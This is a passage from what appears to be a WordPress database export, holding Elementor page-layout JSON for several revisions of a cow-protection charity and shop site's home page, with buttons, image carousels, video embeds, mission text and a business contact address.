here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10204,1707,'_elementor_page_assets','a:0:{}'),(10206,1708,'_elementor_edit_mode','builder'),(10207,1708,'_elementor_template_type','wp-page'),(10208,1708,'_elementor_version','3.7.8'),(10209,1708,'_wp_page_template','elementor_canvas'),(10210,1708,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10211,1708,'_elementor_page_assets','a:0:{}'),(10222,1710,'_elementor_edit_mode','builder'),(10223,1710,'_elementor_template_type','wp-page'),(10224,1710,'_elementor_version','3.7.8'),(10225,1710,'_wp_page_template','elementor_canvas'),(10226,1710,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"